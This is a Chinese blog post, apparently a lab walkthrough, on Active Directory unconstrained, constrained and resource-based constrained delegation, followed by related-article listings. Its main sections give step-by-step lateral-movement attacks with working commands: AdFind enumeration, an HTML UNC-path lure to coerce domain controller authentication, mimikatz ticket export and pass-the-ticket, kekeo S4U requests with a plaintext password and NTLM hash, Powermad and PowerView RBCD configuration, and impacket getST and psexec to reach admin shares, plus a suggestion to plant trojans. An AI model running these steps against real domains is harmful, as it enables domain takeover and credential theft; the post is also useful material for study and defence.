内网安全:非约束委派 约束委派 资源约束委派

于 2024-01-28 23:30:37 发布
阅读量1.5k 收藏 18
点赞数 31
分类专栏: 内网渗透 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/131113851
版权

目录

域委派

非约束委派

配置非约束委派

约束委派

配置约束委派

资源约束委派

计算机加入域

三种委派对比

横向移动:非约束委派利用

原理

利用场景

约束委派利用

一. 判断开启非约束委派的用户和主机

二. 域控域webserver建立通讯

三. 导出票据到本地

四. 加载票据到内存

五. 连接域控

klist purge 与 mimikatz sekurlsa::tickets purge 的区别

横向移动:约束委派利用

实验使用靶场:redteam.red靶场

原理

利用场景

约束委派利用

一. 判断查询

二. 获取用户的票据

三. 获取域控票据

四. 导入票据到内存

五. 连接域控

横向移动:资源约束委派利用

实验环境

原理

安全问题

利用条件

资源约束委派利用

一. 获取受害目标

二. 判断受害用户

三. 增加机器

四. 获取SID

五. 设置修改属性

六. 验证修改是否成功

七. 连接目标获取票据

八. 导入票据到内存

九. 连接data主机

实验靶场:redteam.red

域委派

委派(Delegation)是指将一个实体(主体)的权限授予另一个实体(代理)以代表自己执行某些操作或访问资源的过程。

在计算机系统中,委派通常用于授权一个实体代表另一个实体执行特定的任务。委派可以用于各种情况,例如:

  1. 用户委派:一个用户可以将自己的权限委派给另一个用户,以便后者代表前者执行某些任务或操作,如代表用户管理某个系统或资源。
  2. 服务委派:一个服务可以被授权代表用户执行某些操作,例如代表用户访问其他资源或执行特定的任务。
  3. 资源委派:一个资源可以将访问权限委派给另一个实体,以便该实体能够代表资源执行特定的操作或管理。

委派通常需要通过身份验证和授权机制来实现,以确保被委派的实体具有足够的权限,并受到适当的访问控制限制。委派可以提高系统的灵活性和效率,减少用户的工作负担,并支持更复杂的授权和访问模型。

非约束委派

非约束委派(Unconstrained Delegation)是指将用户或计算机帐户的所有权限都授予另一个用户或计算机帐户,并且该帐户可以将权限继续委派下去,这样可以导致安全隐患。

非约束委派(Unconstrained Delegation)是指在Windows环境中,允许某个服务(通常是Web服务器)接收到的身份验证凭据(例如Kerberos票据)可以被转发给其他服务进行身份验证,而无需对转发的凭据进行限制或验证。

被域控进行非约束委派的域成员主机获得全部权限,并且该可以同样的可以进非约束委派至其他域成员主机

配置非约束委派

选择计算机,右击属性

勾选非约束委派

DC(域控)执行下面命令

查看webadmin用户属性

这就形成了非约束委派的攻击条件,类似于windows的权限继承

约束委派

约束委派(Constrained Delegation)是指在Windows环境中,允许某个服务(通常是Web服务器)接收到的身份验证凭据(例如Kerberos票据)只能被转发给特定的目标服务,以实现更加安全的身份验证和访问控制。

约束委派(Constrained Delegation)是指将用户或计算机帐户的部分权限授予另一个用户或计算机帐户,并限制该帐户只能将授权限委派给特定的服务。这意味着该帐户无法将委派权限向下传递给其他服务,因此更加安全。

配置约束委派

配置属性

 计算机属性

资源约束委派

资源约束委派(Resource-based Constrained Delegation)是约束委派(Constrained Delegation)的一种类型,在Windows环境中用于限制服务接收和转发凭据的目标服务,并同时限制对特定资源的访问权限。

资源约束委派是一种更为精细的委派配置,它允许管理员为特定的资源指定允许接收凭据的服务,并限制这些服务对资源的访问权限。这样一来,即使服务接收到凭据并进行了转发,目标服务仅能访问其被授权的资源,而无法越权访问其他资源。

计算机加入域

右击计算机,更改设置,加入之前输入域成员账号密码才能加入域

 之后才能加入域

三种委派对比

非约束委派:接收的凭据可以无任何限制转发

约束委派:限制了转发的对象

资源约束委派:针对资源本身进行限制,规定可以访问对象;限制服务可以访问的对象

横向移动:非约束委派利用

原理

机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,
一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。从而机器B就能使用这个TGT模拟认证用户(域管用户)访问服务。

利用场景

攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户

约束委派利用

实验背景:拿下一台具有非约束委派权限的主机和账户 webserver

需要提权,后续需要导出票据

一. 判断开启非约束委派的用户和主机

上传AdFind到webserver即可利用

查询域内设置了非约束委派的服务账户

shell AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

说明webadmin有非约束委派权限 

查询域内设置了非约束委派的机器账户

shell AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

 webserver和DC主机具有非约束委派的权限

二. 域控域webserver建立通讯

方式一:域控执行命令

net use \\webserver		#测试网络连接情况

也可以ping一下

方式二:钓鱼

在webserver搭建web页面,钓鱼DC访问

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.31\2">
</body>
</html>

三. 导出票据到本地

mimikatz sekurlsa::tickets /export

四. 加载票据到内存

shell klist

五. 连接域控

shell dir \\owa2010cn-god\c$

之后就可以尝试利用web服务器,下载木马,正向连接上线

或者利用协议copy传递木马上线

klist purge 与 mimikatz sekurlsa::tickets purge 的区别

"klist purge"和"sekurlsa::tickets purge"都是清空Kerberos票据的命令,但它们针对的目标不同。
"klist purge"是Windows系统自带的一个命令,用于清空当前用户会话(session)中缓存的Kerberos票据。如果其他用户或进程缓存了Kerberos票据,并且这些票据未过期,攻击者仍然可以使用它们来进行攻击。

而"sekurlsa::tickets purge"是Mimikatz工具中的一个命令,用于清空当前会话中缓存的Kerberos票据。与"klist purge"不同的是,该命令可以清空整个会话中的所有Kerberos票据,包括其他用户或进程缓存的票据。这意味着,即使在其他会话中有未过期的票据,攻击者也无法使用这些票据进行横向渗透攻击。
相较于"klist purge"命令,"mimikatz sekurlsa::tickets purge"命令在清空Kerberos票据时更加严格和彻底。

横向移动:约束委派利用

实验使用靶场:redteam.red靶场

原理

由于非约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,
引入了SService for User to Self (S4U2Self)和 Service for User to Proxy (S4U2proxy)。

攻击原理如下:

  1. 约束委派:约束委派是一种常见的身份验证和授权机制,在某些环境中允许一个实体(通常是服务)在代表用户执行任务时委派其身份和权限给其他服务。这种委派是受到限制的,只允许被委派的服务访问特定的目标资源。

  2. 错误配置或漏洞:攻击者通过寻找目标系统中存在的错误配置或漏洞,通常是在约束委派设置上出现问题。这些配置错误可能导致被委派的服务具有比预期更多的权限,或者允许攻击者绕过授权检查,获取到未经授权的权限。

  3. 滥用权限:一旦攻击者成功获取到被委派实体的权限,他们可以利用这些权限执行未经授权的操作。这可能包括访问敏感数据、执行恶意代码、横向移动到其他系统等。

利用场景

如果攻击者控制了服务A的账号,并且服务A配置了到域控的CIFS服务的约束性委派。
则攻击者可以先使用S4u2seflt申请域管用户(administrator)访问A服务的ST1,
然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。
 

约束委派利用

这个用户被委派,先获取这个用户的票据,在访问域控,获得域控的票据,在导入内存

一. 判断查询

查询机器用户(主机)配置约束委派

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

查询服务账户(主机)配置约束委派

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

二. 获取用户的票据

两种利用方式:通过明文密码,通过Hash

kekeo "tgt::ask /user:webadmin /domain:god.org /password::admin!@#45 /ticket:administrator.kirbi" "exit"
kekeo "tgt::ask /user:webadmin /domain:god.org /NTLM:518b98ad4178a53695dc997aa02d455c /ticket:administrator.kirbi" "exit"

三. 获取域控票据

kekeo "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god" "exit"
kekeo "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god.god.org" "exit"

 TGS就是服务票据

四. 导入票据到内存

mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god.god.org@GOD.ORG.kirbi

shell klist

五. 连接域控

shell dir \\owa2010cn-god.god.org\c$

横向移动:资源约束委派利用

实验环境

原理

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。

安全问题

倘若一个域用户在多台主机上加入域,也就是多台主机加入域,拿下这个域用户,就可以拿下它所登录的所有主机

利用条件

  • 只要域控制器版本再2012以上就可以实施
  • 有域成员用户加入域

资源约束委派利用

一. 获取受害目标

AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

这两台主机的SID值一样,说明这两台主机是由一个用户加入的

如果想要利用,需要这个域用户的权限,和SID值一样,才能利用

资源委派是三个委派攻击用的最多的。

二. 判断受害用户

查询SID所属用户

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

该用户是dbadmin xd域内普通用户,这两台主机都是用dbadmin登陆的

 接下来实验我们是已经拿到了dbadmin的权限的背景下

三. 增加机器

GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\Powermad.ps1

New-MachineAccount -MachineAccount serviceA -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

 添加一台serviceA 密码:123456

四. 获取SID

PowerSploit/PowerView.ps1 at dev · PowerShellMafia/PowerSploit · GitHub

Import-Module .\PowerView.ps1

Get-NetComputer serviceA -Properties objectsid

S-1-5-21-1695257952-3088263962-2055235443-1108

五. 设置修改属性

powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1108)"		#将SID修改为上方获取的SID值
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

六. 验证修改是否成功

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

清楚修改设置:

Set-DomainObject DATA -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

七. 连接目标获取票据

修改host文件

192.168.3.11 web.xiaodi.org
192.168.3.22 data.xiaodi.org
192.168.3.33 dc.xiaodi.org
192.168.3.33 xiaodi.org

执行Py脚本:

python getST.py -dc-ip 192.168.3.33 xiaodi.local/serviceA\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

 生成ccache票据文件

八. 导入票据到内存

mimikatz kerberos::ptc administrator.ccache

九. 连接data主机

dir \\data.xiaodi.local\c$


python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass

Dao-道法自然
关注
  • 31
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
域内攻击 ----->约束&&约束委派攻击
huohaowen的博客
05-25 817
首先,什么是委派呢?域委派是指将域内用户的权限委派给服务账户,使得服务账号能够以用户的权限在域内展开活动接着,什么样的对象才能被委派呢?主机账号:活动目中中的Computers组内的计算机,也被称为机器账号服务账号:域内用户的一种类型,是服务器运行服务时所用的账号。那么我们去域控上面看一看,顺便说一下本次实验环境后续实验环境皆在此基础上进行先来看机器账号,怎么查看域内的机器有几台呢?完了喜欢eason被你发现捏然后我们去域控上看,DEV和COMPUTERS这两个组。
域渗透委派攻击之约束委派
qq_56426046的博客
11-13 843
(7) 如果请求中包含 PAC,则 KDC 通过检查 PAC 的签名数据来验证 PAC ,如果 PAC 有效或不存在,则 KDC 返回 ST2 给 service1,但存储在 ST2 的 cname 和 crealm 字段中的客户端身份是用户的身份,而不是 service1 的身份。不同于允许委派所有服务的约束委派约束委派的目的是在模拟用户的同时,限制委派机器/帐户对特定服务的访问。已知在约束委派的情况下,服务用户只能获取某个用户或者主机的服务ST,只能用模拟用户访问特定的服务,
域控-笔记三(约束委派攻击,约束委派攻击)
5L2g556F5ZWl77yf
11-25 2523
文章目录一. 域委派1.1 域委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 约束委派攻击本地环境约束委派的查找 一. 域委派 1.1 域委派分类 约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 2497
域渗透约束委派的利用
约束委派攻击
good good study
04-11 7220
当我们查询到域内约束委派的用户或主机时,并知晓它的明文密码或NTLM hash,才能利用工具请求它的TGT;然后利用这个TGT,伪造S4U请求以administrator身份去访问这个服务账号的ST;这里可以生成任意权限身份的ticket,我们是以administrator身份去访问的,所以生成的就是administrator的ticket,这个就是ST;最后使用工具导入这个ST,那我们就能够成功访问域控;通常约束委派多数用于用户权限维持。
安全—无约束接入控制
10-22
 多元接入需求威胁内安全  当今的现代化企业当中,为提升业务弹性和企业竞争力,一个能互联的局域是企业必不可少的组成部分,目前全球常用的开放式IT系统,连接了企业内、外的用户,带给了企业高效、便捷。...
深信服SASE服务:内安全接入
05-05
深信服SASE服务:内安全接入
公司内安全风险管理与审计系统
06-29
公司内安全风险管理与审计系统
安全的六大弊病
10-23
随着企业信息化管理的普及,安全在企业中的作用...但是对于内安全这部分内容,人们还没有具体的措施。对于安全方面的设计存在着种种弊病。文章在这里做了一些总结,希望对各位提高内安全有一定的警示作用。
攻击视角下的内安全.pdf
08-07
安全概念常广泛,目前安全厂商和企业更多的是关注互 联安全,对于内安全关注较少,传统的防御方式已经不能有效对抗专业的攻击者。本次主题完全从攻击者的视角探讨目前企业内中面临的主要安全威胁,从...
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
横向移动—约束委派&约束委派
最新发布
剁椒鱼头没剁椒的博客
08-01 670
在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberos向web server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。
【域权限维持】-基于资源约束委派(RBCD)
qq_41617902的博客
01-20 821
基于资源约束委派(RBCD)
约束委派攻击原理与利用
good good study
04-07 5125
在实际情况中,往往多个服务不可能都在一台机器中,那么如果用户在使用服务A时,又需要用到服务B上的数据,那么最简单的方式就是A代替用户去请求B并返回相应的数据,这个过程就是委派。即 委派=我帮你去做什么事委派攻击分为约束委派约束委派、基于资源约束委派三种。
基于资源约束委派攻击
good good study
04-13 2078
基于资源约束委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束委派。基于资源约束委派不需要域管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束委派的账号的SID。如admin--pc的 msDS-AllowedT
基于资源约束委派
mingyqf的博客
02-23 818
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
基于资源约束委派利用
qq_18811919的博客
02-25 773
关于基于资源约束委派本文章总共说了常用的三种利用方式: 1.Ntlm Relay+打印机bug+基于资源约束委派拿下目标控制权 2.Acount Operators组权限滥用进行基于资源约束委派获取目标权限 3.拿下目标机器入域的域账号拿下目标控制权 以及一种绕过方式: 1.CVE-2020-17049 Kerberos Bronze Bit+基于资源约束委派绕过敏感账号限制。
【内安全】横向移动-域渗透之资源约束委派
今天是几号的博客
04-06 602
基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。
安全攻防:渗透测试实战指南 pdf下载
07-29
对于内安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试内安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: 1. 有合法的授权和使用权限吗? 渗透测试是一项敏感且潜在危险的活动,需要事先与相关当事人保持沟通和达成共识,以确保测试合法、合规和有授权。因此,在下载之前,我们要确保自己拥有相应的合法权限。 2. 评估所需工具和技能 渗透测试需要一定的技术和工具支持。在下载之前,我们需要评估自己是否具备进行渗透测试所需要的技能和经验,并确认自己是否具备所需的工具和环境。 3. 错误使用导致的后果 渗透测试是一项高风险活动,如果错误使用或者测试方法不当,可能导致严重的后果,如业务中断、数据泄露等。因此,在下载之前,我们需要认识到这一点,并确保自己具备相应的安全意识和责任心。 总之,下载内安全攻防和渗透测试实战指南的PDF之前,我们要确保自己拥有合法授权和权限,具备相应的技能和工具,以及清楚认识到错误使用可能导致的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值